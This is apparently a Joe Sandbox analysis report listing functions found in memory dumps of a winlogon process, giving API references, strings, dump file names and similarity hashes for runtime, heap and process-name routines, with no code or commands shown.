Function 000001CA7D218CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D218CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D218D62
RtlUnwindEx.NTDLL ref: 000001CA7D218DBC

Strings

csm, xrefs: 000001CA7D218D49

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: a759c82f011c931f3a48cb36091e1ef5e587e1df0f78fc6b8324226c07ede887
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 6051C133B417089AEB19CB25D084FA8B391FB54B9CF918128AA5547784DB7BC842C7C3

Function 000001CA7D1E8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1E8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CA7D1E8D62
RtlUnwindEx.NTDLL ref: 000001CA7D1E8DBC

Strings

csm, xrefs: 000001CA7D1E8D49

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 60e8b9d452b22d8066b229c291e107fc67761e130e05b0da0dcc3cb05f5680b7
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 2B51E533B917888AFB59CB15E044FAC7791FB94B9DF948110EA4A47B88D77AC841C783

Function 000001CA7D1B9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1B9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001CA7D1B9FBC

Strings

csm, xrefs: 000001CA7D1BA00E
csm, xrefs: 000001CA7D1B9EF6

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 02134d3feda2e96eb50003ad244677908c7789116ae644b7e14578b12ac1f724
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 0E51D333A803888AFB768F51D244B987BA0FB54B9CF944119DA8D47BD5CB7AC451CB83

Function 000001CA7D29AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D29AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001CA7D29ABBC

Strings

csm, xrefs: 000001CA7D29AAF6
csm, xrefs: 000001CA7D29AC0E

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ad04fe1eb2a1edeef54e6bc75b4d769991b9c3402fe3d2ab12d2ac4a189050a6
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 6C51D03398034887FBB68F119244B9877A0FB50B9EF944116DAC967B91CB3AC452C7C3

Function 000001CA7D29A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001CA7D29A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001CA7D29A7A7

Strings

MOC, xrefs: 000001CA7D29A76F
RCC, xrefs: 000001CA7D29A777

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: ed6a1ed037bc458e94a604c567b67e28dc429d86a9db094778d64014e96594a0
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: F361B433908BC881FB628F25E540BDEB7A0FB84799F445215EBC823B55DB39C091CB82

Function 000001CA7D21AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D21AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001CA7D21ABBC

Strings

csm, xrefs: 000001CA7D21AC0E
csm, xrefs: 000001CA7D21AAF6

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 10efc11f376cab87ef4acdaf2b77ccec9d4123c0fd27d91e5cae546ecccaa4a1
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: CA51B23398038887FBB68F119644B9877A1FB50B88F94811ADA5943B95C73BD553C7C3

Function 000001CA7D21A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001CA7D21A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001CA7D21A7A7

Strings

RCC, xrefs: 000001CA7D21A777
MOC, xrefs: 000001CA7D21A76F

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 2a22e60a9b3f854304751452df9d98a64753f55934e27dd4094366773aca3260
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 9C61B933908BC881EB728F15E5407DDB7A0FB85798F448219EB9817B55DB7EC192CB82

Function 000001CA7D1EAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CA7D1EAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001CA7D1EABBC

Strings

csm, xrefs: 000001CA7D1EAC0E
csm, xrefs: 000001CA7D1EAAF6

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: ff7a276064ca23684de81406a1f68796b44ce7f86f6096a08643deba12328983
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: E351C1339843888BFB768F11E644B9877A0FB50B9EF944116DA8947BD1CB3AD450D783

Function 000001CA7D1EA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001CA7D1EA75B
_CallSETranslator.LIBVCRUNTIME ref: 000001CA7D1EA7A7

Strings

RCC, xrefs: 000001CA7D1EA777
MOC, xrefs: 000001CA7D1EA76F

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 60592a73bcc56e8fc24094758dd9bb65472a20c058267f86d1c17b185443617f
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 3161AE33908BC881EB22CF15E540BDAB7A0FB85B99F444215EB9913B99DB7DC190CB42

Function 000001CA7D293950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001CA7D293972
StrStrW.SHLWAPI ref: 000001CA7D293990
StrToIntW.SHLWAPI ref: 000001CA7D2939B7

Part of subcall function 000001CA7D291A30: OpenProcess.KERNEL32 ref: 000001CA7D291A56
Part of subcall function 000001CA7D291A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D291A74
Part of subcall function 000001CA7D291A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D291A83
Part of subcall function 000001CA7D291A30: lstrlenW.KERNEL32 ref: 000001CA7D291A8F
Part of subcall function 000001CA7D291A30: StrCpyW.SHLWAPI ref: 000001CA7D291AA2
Part of subcall function 000001CA7D291A30: CloseHandle.KERNEL32 ref: 000001CA7D291AB0

Part of subcall function 000001CA7D293F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D29272F), ref: 000001CA7D293FA0

Strings

pid_, xrefs: 000001CA7D293968

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 28175376d5654a325b6e3448a41641f0585f000515273b2e813776c3207c95cb
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 25119032B5878591FB129B25E8007DB72A4FF88789FC004219E4993694EF7AC807C7C3

Function 000001CA7D213950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001CA7D213972
StrStrW.SHLWAPI ref: 000001CA7D213990
StrToIntW.SHLWAPI ref: 000001CA7D2139B7

Part of subcall function 000001CA7D211A30: OpenProcess.KERNEL32 ref: 000001CA7D211A56
Part of subcall function 000001CA7D211A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D211A74
Part of subcall function 000001CA7D211A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D211A83
Part of subcall function 000001CA7D211A30: lstrlenW.KERNEL32 ref: 000001CA7D211A8F
Part of subcall function 000001CA7D211A30: StrCpyW.SHLWAPI ref: 000001CA7D211AA2
Part of subcall function 000001CA7D211A30: CloseHandle.KERNEL32 ref: 000001CA7D211AB0

Part of subcall function 000001CA7D213F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D21272F), ref: 000001CA7D213FA0

Strings

pid_, xrefs: 000001CA7D213968

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: f5c0b545fa3a07ccbfa5bb088918576c4613ccf87af992a5142b58f16c0f08fa
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: F411A532B5878551FB129B25E8007DA76A5BF48748FC08429AA4983694EF3BC90BC7C3

Function 000001CA7D1E3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001CA7D1E3972
StrStrW.SHLWAPI ref: 000001CA7D1E3990
StrToIntW.SHLWAPI ref: 000001CA7D1E39B7

Part of subcall function 000001CA7D1E1A30: OpenProcess.KERNEL32 ref: 000001CA7D1E1A56
Part of subcall function 000001CA7D1E1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001CA7D1E1A74
Part of subcall function 000001CA7D1E1A30: PathFindFileNameW.SHLWAPI ref: 000001CA7D1E1A83
Part of subcall function 000001CA7D1E1A30: lstrlenW.KERNEL32 ref: 000001CA7D1E1A8F
Part of subcall function 000001CA7D1E1A30: StrCpyW.SHLWAPI ref: 000001CA7D1E1AA2
Part of subcall function 000001CA7D1E1A30: CloseHandle.KERNEL32 ref: 000001CA7D1E1AB0

Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0

Strings

pid_, xrefs: 000001CA7D1E3968

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 913d229e8f2f92123c0244f313f8f46853348ecc3afd0aa29f5a796bf9d5dd00
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 6311DA3375078551FB129B25E8007DAB7A4FF84B4AFC004259E49C3695EF7AC985C783

Function 000001CA7D2A1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001CA7D2A2027
WriteFile.KERNEL32 ref: 000001CA7D2A2304
WriteFile.KERNEL32 ref: 000001CA7D2A234A
GetLastError.KERNEL32 ref: 000001CA7D2A2409

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 0fe5e95353cfd2dd0c501b22aeddf9fd2a82a384c77f1e00d125b204ea73b71d
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: DFD1CB33B14B9889F712CFA5D440ADD37B1FB95B98F805116CE59ABB99DA35C00BC382

Function 000001CA7D221FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001CA7D222027
WriteFile.KERNEL32 ref: 000001CA7D222304
WriteFile.KERNEL32 ref: 000001CA7D22234A
GetLastError.KERNEL32 ref: 000001CA7D222409

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: dd6aa663578507b66a76ee1b3aff8a7eb3297d8e7c986e84e6755fe8025d9d4f
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: B1D1CA33B14B8889F712CFA5D440ADC37B1FB54B98F814216EE49A7B99DA36D107C386

Function 000001CA7D1F1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001CA7D1F2027
WriteFile.KERNEL32 ref: 000001CA7D1F2304
WriteFile.KERNEL32 ref: 000001CA7D1F234A
GetLastError.KERNEL32 ref: 000001CA7D1F2409

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 18d3852c168644b29a851a8876877b9c6a5370015fb03373ffbcdf4b1c2788c7
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: FBD1C833B55B8889F712CFA5D440ADC37B1FB44B98F804256CE4EA7B9ADA35C106C382

Function 000001CA7D2914A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D2914C6
HeapFree.KERNEL32 ref: 000001CA7D2914D5
GetProcessHeap.KERNEL32 ref: 000001CA7D2914E2
HeapFree.KERNEL32 ref: 000001CA7D2914F1
GetProcessHeap.KERNEL32 ref: 000001CA7D291501

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 662269b3e822107970afb4c35fa0ae41ecd28bd6936e08448754d08bde8c420b
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 7F015732A50B84DAE715DF66A80499A77A0FBC8F88B894025DF4957728DE39D052C782

Function 000001CA7D2114A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D2114C6
HeapFree.KERNEL32 ref: 000001CA7D2114D5
GetProcessHeap.KERNEL32 ref: 000001CA7D2114E2
HeapFree.KERNEL32 ref: 000001CA7D2114F1
GetProcessHeap.KERNEL32 ref: 000001CA7D211501

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
